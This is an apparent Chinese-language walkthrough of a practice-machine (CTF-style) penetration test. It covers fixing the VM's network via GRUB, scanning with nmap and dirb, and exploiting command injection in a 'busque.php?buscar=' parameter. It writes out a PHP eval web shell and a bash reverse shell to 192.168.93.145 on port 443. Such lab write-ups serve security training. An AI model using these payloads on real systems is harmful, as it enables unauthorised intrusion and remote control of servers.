启动靶机时点shift停在这个界面

点e进入编辑页面,把ro改成rw signie init=/bin/bash


Ctrl+x保存,ip a查看网卡信息

vim /etc/network/interfaces

把enp0s17改为ens33,保存退出

重启靶机,nmap扫ip
ip为192.168.93.179

nmap扫端口
扫出21,80两个端口

dirb扫目录

查看web页面

site点击右上的Buscar

发现一个传参点

发现可以执行命令

上传1.txt发现可以上传
192.168.93.179/site/busque.php?buscar=echo '123' > 1.txt

上传一句话木马
192.168.93.179/site/busque.php?buscar=echo '<?php @eval($_POST[cmd]);?>' > shell.php


上传一个反弹shell的php文件(只能用443端口)

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.93.145/443 0>&1'");?>
nc开启监听,反弹成功

